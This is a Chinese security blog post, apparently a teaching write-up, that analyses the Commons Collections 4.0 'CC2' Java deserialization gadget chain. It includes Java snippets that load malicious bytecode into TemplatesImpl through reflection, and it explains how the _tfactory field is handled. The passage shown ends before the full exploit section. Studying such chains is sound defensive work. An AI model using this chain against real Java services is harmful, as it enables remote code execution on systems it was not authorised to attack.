<!--
  ╔══════════════════════════════════════════════════════════════╗
  ║                                                              ║
  ║   🎮 CTF Easter Egg Challenge!                               ║
  ║                                                              ║
  ║   Congratulations! You found the hidden comment!             ║
  ║                                                              ║
  ║   Here's your clue: The flag is the site owner's name        ║
  ║   in lowercase letters.                                      ║
  ║                                                              ║
  ║   Open browser console and type:                             ║
  ║   secret.flag("your_answer")                                 ║
  ║                                                              ║
  ║   Or try: secret.hint() for more clues                       ║
  ║                                                              ║
  ╚══════════════════════════════════════════════════════════════╝
-->

<!DOCTYPE html><html lang="zh-CN" data-theme="dark">

<head>
  <meta charset="utf-8">
  <style id="waifu-preload">#waifu{opacity:0;background:transparent;}#waifu canvas,#waifu #live2d,#waifu-toolbar{background:transparent;}</style>
  <meta name="hexo-theme" content="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.33.1" theme-name="Stellar" theme-version="1.33.1">
  <link rel="manifest" href="/manifest.json">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="apple-mobile-web-app-title" content="Blog">
  
  
  <meta name="generator" content="Hexo 7.3.0">
  <meta http-equiv='x-dns-prefetch-control' content='on' />
  
  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#000">
  <meta name="theme-color" content="#f9fafb">
  <title>代码审计 | CC2 链 —— _tfactory 赋值问题 PriorityQueue 新入口 - blog</title>

  
    <meta name="description" content="代码审计 | CC2 链 —— _tfactory 赋值问题 PriorityQueue 新入口目录 前言 环境 链路分析 Sink：TemplatesImpl 与 _tfactory 赋值问题 InvokerTransformer TransformingComparator（关键节点） PriorityQueue：入口点   EXP 编写 完整调用链追踪 为什么必须用 CC 4.0 小结">
<meta property="og:type" content="article">
<meta property="og:title" content="代码审计 | CC2 链 —— _tfactory 赋值问题 PriorityQueue 新入口">
<meta property="og:url" content="https://wr0ld.github.io/posts/d7f9a3c1/">
<meta property="og:site_name" content="blog">
<meta property="og:description" content="代码审计 | CC2 链 —— _tfactory 赋值问题 PriorityQueue 新入口目录 前言 环境 链路分析 Sink：TemplatesImpl 与 _tfactory 赋值问题 InvokerTransformer TransformingComparator（关键节点） PriorityQueue：入口点   EXP 编写 完整调用链追踪 为什么必须用 CC 4.0 小结">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://wr0ld.github.io/avatar.png">
<meta property="article:published_time" content="2026-04-06T04:00:00.000Z">
<meta property="article:modified_time" content="2026-04-06T08:43:38.045Z">
<meta property="article:author" content="wr0ld">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="Java">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="Java反序列化">
<meta property="article:tag" content="CC链">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://wr0ld.github.io/avatar.png">
  
  
  
  <meta name="keywords" content="代码审计,Java,反序列化,Java反序列化,CC链">

  <!-- feed -->
  

  <link rel="stylesheet" href="/css/main.css?v=1.0.0">


  
    <link rel="shortcut icon" href="/avatar.png">
  

  

  <script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"wr0ld","sameAs":[],"image":"/avatar.png"},"dateCreated":"2026-04-06T12:00:00+08:00","dateModified":"2026-04-06T16:43:38+08:00","datePublished":"2026-04-06T12:00:00+08:00","description":"","headline":"代码审计 | CC2 链 —— _tfactory 赋值问题 PriorityQueue 新入口","mainEntityOfPage":{"@type":"WebPage","@id":"https://wr0ld.github.io/posts/d7f9a3c1/"},"publisher":{"@type":"Organization","name":"wr0ld","sameAs":[],"image":"/avatar.png","logo":{"@type":"ImageObject","url":"/avatar.png"}},"url":"https://wr0ld.github.io/posts/d7f9a3c1/","keywords":"代码审计, Java, 反序列化, Java反序列化, CC链","thumbnailUrl":"https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/08a7105b75182080de31b152077c6681.jpg","image":1}</script>
  
</head>
<body>

<div class="l_body content" id="start" layout="post" type="tech" ><aside class="l_left"><div class="sidebg"></div><div class="leftbar-container">


<header class="header"><div class="logo-wrap"><a class="avatar" href="/about/"><div class="bg" style="opacity:0;background-image:url(https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/rainbow64@3x.webp);"></div><img no-lazy class="avatar" src="/avatar.png" onerror="javascript:this.classList.add('error');this.src='https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/image/2659360.svg';"></a><a class="title" href="/"><div class="main">blog</div></a></div></header>

<div class="nav-area">

<nav class="menu dis-select"><a class="nav-item active" title="博客" href="/" style="color:#1BCDFC"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" fill-rule="evenodd" d="M5.879 2.879C5 3.757 5 5.172 5 8v8c0 2.828 0 4.243.879 5.121C6.757 22 8.172 22 11 22h2c2.828 0 4.243 0 5.121-.879C19 20.243 19 18.828 19 16V8c0-2.828 0-4.243-.879-5.121C17.243 2 15.828 2 13 2h-2c-2.828 0-4.243 0-5.121.879M8.25 17a.75.75 0 0 1 .75-.75h3a.75.75 0 0 1 0 1.5H9a.75.75 0 0 1-.75-.75M9 12.25a.75.75 0 0 0 0 1.5h6a.75.75 0 0 0 0-1.5zM8.25 9A.75.75 0 0 1 9 8.25h6a.75.75 0 0 1 0 1.5H9A.75.75 0 0 1 8.25 9" clip-rule="evenodd"/><path fill="currentColor" d="M5.235 4.058C5 4.941 5 6.177 5 8v8c0 1.823 0 3.058.235 3.942L5 19.924c-.975-.096-1.631-.313-2.121-.803C2 18.243 2 16.828 2 14v-4c0-2.829 0-4.243.879-5.121c.49-.49 1.146-.707 2.121-.803zm13.53 15.884C19 19.058 19 17.822 19 16V8c0-1.823 0-3.059-.235-3.942l.235.018c.975.096 1.631.313 2.121.803C22 5.757 22 7.17 22 9.999v4c0 2.83 0 4.243-.879 5.122c-.49.49-1.146.707-2.121.803z" opacity=".5"/></svg></a><a class="nav-item" title="实验室" href="/lab/" style="color:#F39C12"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M3.464 3.464C2 4.93 2 7.286 2 12s0 7.071 1.464 8.535C4.93 22 7.286 22 12 22s7.071 0 8.535-1.465C22 19.072 22 16.714 22 12s0-7.071-1.465-8.536C19.072 2 16.714 2 12 2S4.929 2 3.464 3.464" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M7.47 8.47a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.75.75 0 1 1-1.06-1.06L8.94 11L7.47 9.53a.75.75 0 0 1 0-1.06M12 14.25a.75.75 0 0 0 0 1.5h4a.75.75 0 0 0 0-1.5z" clip-rule="evenodd"/></svg></a><a class="nav-item" title="游戏" href="/games/" style="color:#FF6B6B"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M2 9.5c0-2.496 0-3.744.494-4.696a4.5 4.5 0 0 1 1.81-1.81C5.256 2.5 6.504 2.5 9 2.5h6c2.496 0 3.744 0 4.696.494a4.5 4.5 0 0 1 1.81 1.81C22 5.756 22 7.004 22 9.5v5c0 2.496 0 3.744-.494 4.696a4.5 4.5 0 0 1-1.81 1.81C18.744 21.5 17.496 21.5 15 21.5H9c-2.496 0-3.744 0-4.696-.494a4.5 4.5 0 0 1-1.81-1.81C2 18.244 2 16.996 2 14.5z" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M6.25 12a.75.75 0 0 1 .75-.75h2.25V9a.75.75 0 0 1 1.5 0v2.25H13a.75.75 0 0 1 0 1.5h-2.25V15a.75.75 0 0 1-1.5 0v-2.25H7a.75.75 0 0 1-.75-.75m9.5-1a1 1 0 1 0 0 2a1 1 0 0 0 0-2m2 3a1 1 0 1 0 2 0a1 1 0 0 0-2 0" clip-rule="evenodd"/></svg></a><a class="nav-item" title="卡牌" href="javascript:if(window.CardSystem)window.CardSystem.showPanel()" style="color:#E91E63"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M3.464 3.464C2 4.93 2 7.286 2 12s0 7.071 1.464 8.535C4.93 22 7.286 22 12 22s7.071 0 8.535-1.465C22 19.072 22 16.714 22 12s0-7.071-1.465-8.536C19.072 2 16.714 2 12 2S4.929 2 3.464 3.464" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M7.5 6.75a.75.75 0 0 0-.75.75v1.5c0 .414.336.75.75.75h9a.75.75 0 0 0 .75-.75v-1.5a.75.75 0 0 0-.75-.75zm-.75 5.25a.75.75 0 0 1 .75-.75h4.5a.75.75 0 0 1 0 1.5H7.5a.75.75 0 0 1-.75-.75m.75 2.25a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 0-1.5z" clip-rule="evenodd"/></svg></a><a class="nav-item" title="设置" href="/settings/" style="color:#9B59B6"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M12 2c-1.5 0-2.5 1.5-2.5 3v.5c0 .5-.5 1-1 1H7c-1.5 0-2.5 1-3 2.5l-.5 2c-.5 1.5.5 3 2 3.5l.5.2c.5.2 1 .7 1 1.3v.5c0 .5-.5 1-1 1.3l-.5.2c-1.5.5-2.5 2-2 3.5l.5 2c.5 1.5 1.5 2.5 3 2.5h1.5c.5 0 1-.5 1-1V20c0-.5.5-1 1-1h2c.5 0 1 .5 1 1v.5c0 .5.5 1 1 1H17c1.5 0 2.5-1 3-2.5l.5-2c.5-1.5-.5-3-2-3.5l-.5-.2c-.5-.2-1-.7-1-1.3v-.5c0-.5.5-1 1-1.3l.5-.2c1.5-.5 2.5-2 2-3.5l-.5-2c-.5-1.5-1.5-2.5-3-2.5h-1.5c-.5 0-1 .5-1 1V6c0 .5-.5 1-1 1h-2c-.5 0-1-.5-1-1v-.5c0-.5-.5-1-1-1" opacity=".5"/><path fill="currentColor" d="M12 15a3 3 0 1 0 0-6a3 3 0 0 0 0 6" clip-rule="evenodd"/></svg></a><a class="nav-item" title="关于" href="/about/" style="color:#3DC550"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4s-4 1.79-4 4s1.79 4 4 4" opacity=".5"/><path fill="currentColor" fill-rule="evenodd" d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10s10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5l1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z" clip-rule="evenodd"/></svg></a></nav>
</div>
<div class="widgets">
<div class="search-wrapper" id="search-wrapper"><form class="search-form"><a class="search-button" onclick="document.getElementById(&quot;search-input&quot;).focus();"><svg t="1705074644177" viewBox="0 0 1025 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1560" width="200" height="200"><path d="M1008.839137 935.96571L792.364903 719.491476a56.783488 56.783488 0 0 0-80.152866 0 358.53545 358.53545 0 1 1 100.857314-335.166073 362.840335 362.840335 0 0 1-3.689902 170.145468 51.248635 51.248635 0 1 0 99.217358 26.444296 462.057693 462.057693 0 1 0-158.255785 242.303546l185.930047 185.725053a51.248635 51.248635 0 0 0 72.568068 0 51.248635 51.248635 0 0 0 0-72.978056z" p-id="1561"></path><path d="M616.479587 615.969233a50.428657 50.428657 0 0 0-61.498362-5.534852 174.655348 174.655348 0 0 1-177.525271 3.484907 49.403684 49.403684 0 0 0-58.833433 6.76482l-3.074918 2.869923a49.403684 49.403684 0 0 0 8.609771 78.10292 277.767601 277.767601 0 0 0 286.992355-5.739847 49.403684 49.403684 0 0 0 8.404776-76.667958z" p-id="1562"></path></svg></a><input type="text" class="search-input" id="search-input" placeholder="站内搜索"></form><div id="search-result"></div><div class="search-no-result">没有找到内容！</div></div>

<widget class="widget-wrapper todo-widget collapsible-widget"><div class="widget-header dis-select"><span class="name">任务简报 <span class="todo-count">(12)</span></span><span class="collapse-toggle"><i class="fas fa-chevron-down"></i></span></div><div class="widget-body fs14"><div class="todo-list"><div class="todo-item doing"><span class="todo-content">内存马 Valve → Agent → 检测查杀</span></div><div class="todo-item doing"><span class="todo-content">log4j 内存马+jndi urldns grov</span></div><div class="todo-item doing"><span class="todo-content">EDUSRC实战漏洞挖掘复盘脱敏</span></div><div class="todo-item doing"><span class="todo-content">小迪vpc1-5 Windows系统web内网横向域内</span></div><div class="todo-item doing"><span class="todo-content">rootkit 的 shellcode 嵌入</span></div><div class="todo-item doing"><span class="todo-content">fastjson 1.2.68 → 1.2.80</span></div><div class="todo-item doing"><span class="todo-content">java cc4 5 7</span></div><div class="todo-item doing"><span class="todo-content">Shiro 721</span></div><div class="todo-item doing"><span class="todo-content">信息收集</span></div><div class="todo-item doing"><span class="todo-content">PHP反序列化 + Pop Chain构造</span></div><div class="todo-item doing"><span class="todo-content">云上服务</span></div><div class="todo-item doing"><span class="todo-content">docker容器逃逸</span></div></div></div></widget>
</div>

</div></aside><div class="l_main" id="main">





<div class="article banner top">
  <div class="content">
    <div class="top bread-nav footnote"><div class="left"><div class="flex-row" id="breadcrumb"><a class="cap breadcrumb" href="/">主页</a>
<span class="sep"></span><a class="cap breadcrumb" href="/">文章</a><span class="sep"></span><a class="cap breadcrumb-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a> <span class="sep"></span> <a class="cap breadcrumb-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/cc/">cc</a></div>
<div class="flex-row" id="post-meta"><span class="text created">发布于：<time datetime="2026-04-06T04:00:00.000Z">2026-04-06</time></span><span class="sep"></span><span class="text word-count">字数：11908</span><span class="sep"></span><span class="text img-count">图片：46</span></div></div></div>
    
    <div class="bottom only-title">
      
      <div class="text-area">
        <h1 class="text title"><span>代码审计 | CC2 链 —— _tfactory 赋值问题 PriorityQueue 新入口</span></h1>
        
      </div>
    </div>
    
  </div>
  </div><article class="md-text content"><h1 id="代码审计-CC2-链-——-tfactory-赋值问题-PriorityQueue-新入口"><a href="#代码审计-CC2-链-——-tfactory-赋值问题-PriorityQueue-新入口" class="headerlink" title="代码审计 | CC2 链 —— _tfactory 赋值问题 PriorityQueue 新入口"></a>代码审计 | CC2 链 —— _tfactory 赋值问题 PriorityQueue 新入口</h1><h2 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h2><ul>
<li><a href="#%E5%89%8D%E8%A8%80">前言</a></li>
<li><a href="#%E7%8E%AF%E5%A2%83">环境</a></li>
<li><a href="#%E9%93%BE%E8%B7%AF%E5%88%86%E6%9E%90">链路分析</a><ul>
<li><a href="#sinktemplatesmpl-%E4%B8%8E-_tfactory-%E8%B5%8B%E5%80%BC%E9%97%AE%E9%A2%98">Sink：TemplatesImpl 与 _tfactory 赋值问题</a></li>
<li><a href="#invokertransformer">InvokerTransformer</a></li>
<li><a href="#transformingcomparator%E5%85%B3%E9%94%AE%E8%8A%82%E7%82%B9">TransformingComparator（关键节点）</a></li>
<li><a href="#priorityqueue%E5%85%A5%E5%8F%A3%E7%82%B9">PriorityQueue：入口点</a></li>
</ul>
</li>
<li><a href="#exp-%E7%BC%96%E5%86%99">EXP 编写</a></li>
<li><a href="#%E5%AE%8C%E6%95%B4%E8%B0%83%E7%94%A8%E9%93%BE%E8%BF%BD%E8%B8%AA">完整调用链追踪</a></li>
<li><a href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E5%BF%85%E9%A1%BB%E7%94%A8-cc-40">为什么必须用 CC 4.0</a></li>
<li><a href="#%E5%B0%8F%E7%BB%93">小结</a></li>
</ul>
<hr>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>CC3 里我们用 TemplatesImpl 实现了字节码加载，触发点是通过 <code>InstantiateTransformer</code> 调用 <code>TrAXFilter</code> 的构造方法，入口依然是 <code>LazyMap</code> 那套。CC2 在这个基础上换了个思路，sink 还是 <code>TemplatesImpl.newTransformer()</code>，但触发链完全换掉了，入口变成了 <code>PriorityQueue</code>，中间靠 <code>TransformingComparator</code> 串起来。</p>
<p>另外有个很重要的区别：<strong>CC2 用的是 Commons Collections 4.0，而不是之前的 3.2.1</strong>。原因后面分析到 <code>TransformingComparator</code> 的时候会说。</p>
<hr>
<h2 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h2><ul>
<li>JDK 8u65</li>
<li>Commons Collections <strong>4.0</strong>（注意版本）</li>
<li>IDEA + 调试器</li>
</ul>
<p>pom.xml 依赖改成这样：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependencies</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.apache.commons<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>commons-collections4<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">version</span>&gt;</span>4.0<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependencies</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405152949570.png"></p>
<p>包名也从 <code>org.apache.commons.collections</code> 变成了 <code>org.apache.commons.collections4</code>，导包的时候注意一下。</p>
<hr>
<h2 id="链路分析"><a href="#链路分析" class="headerlink" title="链路分析"></a>链路分析</h2><p>还是习惯从 sink 反推，找清楚每个节点怎么串起来的，再写 EXP。</p>
<h3 id="Sink：TemplatesImpl-与-tfactory-赋值问题"><a href="#Sink：TemplatesImpl-与-tfactory-赋值问题" class="headerlink" title="Sink：TemplatesImpl 与 _tfactory 赋值问题"></a>Sink：TemplatesImpl 与 _tfactory 赋值问题</h3><p>这个在 CC3 里分析过了，简单过一下。<code>TemplatesImpl</code> 里面有三个关键字段：<code>_bytecodes</code>（恶意字节码数组）、<code>_name</code>（不能为 null）和 <code>_tfactory</code>。</p>
<p>调用 <code>newTransformer()</code> 会触发 <code>getTransletInstance()</code> → <code>defineTransletClasses()</code> → 加载 <code>_bytecodes</code> 里的字节码并实例化，恶意代码在静态块或构造方法里就会执行。</p>
<p>这里展开说一下 <code>_tfactory</code> 到底要不要赋值的问题，这个之前文章里留了个坑。</p>
<hr>
<p><strong>半 payload 测试（未走反序列化）</strong></p>
<p>之前的文章判断是说 <code>defineTransletClasses</code> 函数里有 <code>_tfactory.getExternalExtensionsMap()</code> 的调用，所以 <code>_tfactory</code> 必须赋值。</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405154116053.png"></p>
<p>但当时测试用的是”半 payload”，直接调用 <code>templates.newTransformer()</code> 触发，并没有走完整的反序列化流程：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">wu_</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">byte</span>[] bytecode = Files.readAllBytes(Paths.get(<span class="string">&quot;target\\classes\\org\\example\\EvilClass.class&quot;</span>));</span><br><span class="line">        <span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line">        <span class="type">Field</span> <span class="variable">f1</span> <span class="operator">=</span> TemplatesImpl.class.getDeclaredField(<span class="string">&quot;_bytecodes&quot;</span>);</span><br><span class="line">        f1.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        f1.set(templates, <span class="keyword">new</span> <span class="title class_">byte</span>[][]&#123;bytecode&#125;);</span><br><span class="line">        <span class="type">Field</span> <span class="variable">f2</span> <span class="operator">=</span> TemplatesImpl.class.getDeclaredField(<span class="string">&quot;_name&quot;</span>);</span><br><span class="line">        f2.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        f2.set(templates, <span class="string">&quot;EvilClass&quot;</span>);</span><br><span class="line"><span class="comment">//        Field f3 = TemplatesImpl.class.getDeclaredField(&quot;_tfactory&quot;);</span></span><br><span class="line"><span class="comment">//        f3.setAccessible(true);</span></span><br><span class="line"><span class="comment">//        f3.set(templates, new TransformerFactoryImpl());</span></span><br><span class="line"></span><br><span class="line">        templates.newTransformer(); <span class="comment">// 应该弹出计算器</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405161510127.png"></p>
<p>把 <code>_tfactory</code> 赋值注释掉之后，得到的是 NullPointerException（NPE），错误出现在 <code>defineTransletClasses</code> 函数里的 <code>_tfactory.getExternalExtensionsMap()</code> 这里，字节码还没开始加载链就断了。</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405162758646.png"></p>
<p>调试发现此时 <code>_tfactory</code> 确实是 null：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405161848994.png"></p>
<p>所以当时得出了”必须给 <code>_tfactory</code> 反射赋值”的结论。</p>
<p>赋值之后：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405163051914.png"></p>
<p>虽然还有 NPE 报错，但位置不在 <code>defineTransletClasses</code> 里了——这些报错都是字节码加载完之后的事，payload 已经正常执行，计算器弹出。</p>
<hr>
<p><strong>完整 payload 测试（走完整反序列化）</strong></p>
<p>写这篇文章的时候又发现了新问题。用 CC3 的完整 payload（CC3TransformedMap）测试，之前说是需要赋值的：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405163542209.png"></p>
<p>演示也没有问题，有 NPE 但不是 <code>defineTransletClasses</code> 里的。调试找到 <code>_tfactory</code>，确实有值：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405164124133.png"></p>
<p>然后把 <code>_tfactory</code> 的赋值注释掉再试：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405164603485.png"></p>
<p><strong>依然可以弹出？！</strong> 而且也没有出现之前半 payload 里 <code>defineTransletClasses</code> 的 NPE 报错。</p>
<p>调试看 <code>_tfactory</code> 的值：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405164742850.png"></p>
<p>我们没有手动赋值，但 <code>_tfactory</code> 还是有值。原因是 <code>TemplatesImpl</code> 类的 <code>readObject</code> 方法里有这么一行：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_tfactory = <span class="keyword">new</span> <span class="title class_">TransformerFactoryImpl</span>();</span><br></pre></td></tr></table></figure>

<p>反序列化的时候会自动为 <code>_tfactory</code> 创建对象并赋值：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405165014108.png"></p>
<p>经过调试进一步发现，不管我们有没有手动给 <code>_tfactory</code> 赋值，进入反序列化流程之后 <code>_tfactory</code> 显示的都是 null——这是因为反序列化不仅会触发最外层对象的 <code>readObject</code>，链里面每个对象如果有 <code>readObject</code> 方法，也都会被自动调用。<code>TemplatesImpl</code> 自己的 <code>readObject</code> 里会重新初始化 <code>_tfactory</code>，所以手动赋值根本没用。</p>
<hr>
<p><strong>还有个小问题：为什么赋值了但 _tfactory 调试里显示还是 null？</strong></p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405165548507.png"></p>
<p>查看 <code>_tfactory</code> 的属性，发现它带了 <code>transient</code> 修饰符：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405165751259.png"></p>
<p><code>transient</code> 的作用很简单：序列化的时候这个字段直接被跳过，不写进字节流。所以不管你有没有手动赋值，序列化之后这个值都不存在了，反序列化时由 <code>readObject</code> 重新创建。</p>
<p>而 <code>_name</code>、<code>_bytecodes</code> 都是普通的私有属性，没有 <code>transient</code>，所以可以正常序列化传递。</p>
<hr>
<p><strong>结论</strong></p>
<blockquote>
<p>完整 payload 里手动赋值 <code>_tfactory</code> 是无效操作，最终生效的永远是 <code>readObject()</code> 里 <code>new</code> 的那个。半成品 payload 没走反序列化，<code>readObject()</code> 不会触发，所以必须手动赋值才能用。</p>
<p>如果出现了 <code>defineTransletClasses</code> 的 NPE 报错，可以再手动赋值一下（加了也没有坏处）。</p>
</blockquote>
<hr>
<p>这个问题搞清楚之后，继续看链路。</p>
<p>CC2 里直接用 <code>InvokerTransformer</code> 反射调用 <code>newTransformer()</code>，不像 CC3 那样绕 <code>TrAXFilter</code>，所以链路更直接一些。也没有用到 <code>ChainedTransformer</code> 去串联——因为 CC3 的入口是 <code>LazyMap</code>，触发点是 <code>LazyMap.get(key)</code>，传给 <code>transform()</code> 的是 map 的 <strong>key</strong>（普通字符串，不是 <code>TemplatesImpl</code> 实例），所以才需要 <code>ChainedTransformer</code> 先用 <code>ConstantTransformer</code> 把 key 替换掉：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ChainedTransformer:</span><br><span class="line">  ConstantTransformer(TrAXFilter.class)     ← 丢掉 key，返回 TrAXFilter.class</span><br><span class="line">  InstantiateTransformer(templates)         ← 实例化 TrAXFilter，构造方法里调 newTransformer()</span><br></pre></td></tr></table></figure>

<p>CC2 不走这条路，目标是直接找到一个能触发 <code>TemplatesImpl.newTransformer()</code> 的方法。</p>
<hr>
<h3 id="InvokerTransformer"><a href="#InvokerTransformer" class="headerlink" title="InvokerTransformer"></a>InvokerTransformer</h3><p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405174253095.png"></p>
<p>这就是一个封装了反射调用的 Transformer：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">method.invoke(input, iArgs);</span><br><span class="line">  method  — 要调用的方法对象，通过 input.getClass().getMethod(iMethodName, iParamTypes) 拿到</span><br><span class="line">  input   — 调用这个方法的对象，也就是方法的调用者</span><br><span class="line">  iArgs   — 传给这个方法的参数列表</span><br></pre></td></tr></table></figure>

<p>等价于直接写：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">templatesImpl.newTransformer();</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wr0ld/BlogImage@main/img/20260405184226000.png"></p>
<p><code>InvokerTransformer</code> 有两个构造方法，参数不一样。第一个是私有的，用第二个。如果两个都是私有的，就需要用反射拿到私有构造方法再调用(如果这样就又会出现新问题,不会自动触发)：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Constructor&lt;InvokerTransformer&gt; constructor = InvokerTransformer.class.getDeclaredConstructor(String.class);</span><br><span class="line">constructor.setAccessible(<span class="literal">true</span>);  <span class="comment">// 突破 private 限制</span></span><br><span class="line"><span class="type">InvokerTransformer</span> <span class="variable">transformer</span> <span class="operator">=</span> constructor.newInstance(<span class="string">&quot;newTransformer&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><code>transform(input)</code> 会对 input 对象调用指定方法。我们构造：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;newTransformer&quot;</span>, <span class="literal">null</span>, <span class="literal">null</span>)</span><br></pre></td></tr></table></figure>

<p>（后面两个 null 也可以改成空数组，可以减少部分 NPE 报错）</p>
<p>接下来的问题就是：怎么触发这个 <code>transform(input)</code>？</p>
<hr>
<h3 id="TransformingComparator（关键节点）"><a href="#TransformingComparator（关键节点）" class="headerlink" title="TransformingComparator（关键节点）"></a>TransformingComparator（关键节点）</h3><p>CC2 里用的是 <code>TransformingComparator.compare()</code> 来触发 <code>transform()</code>。</p>
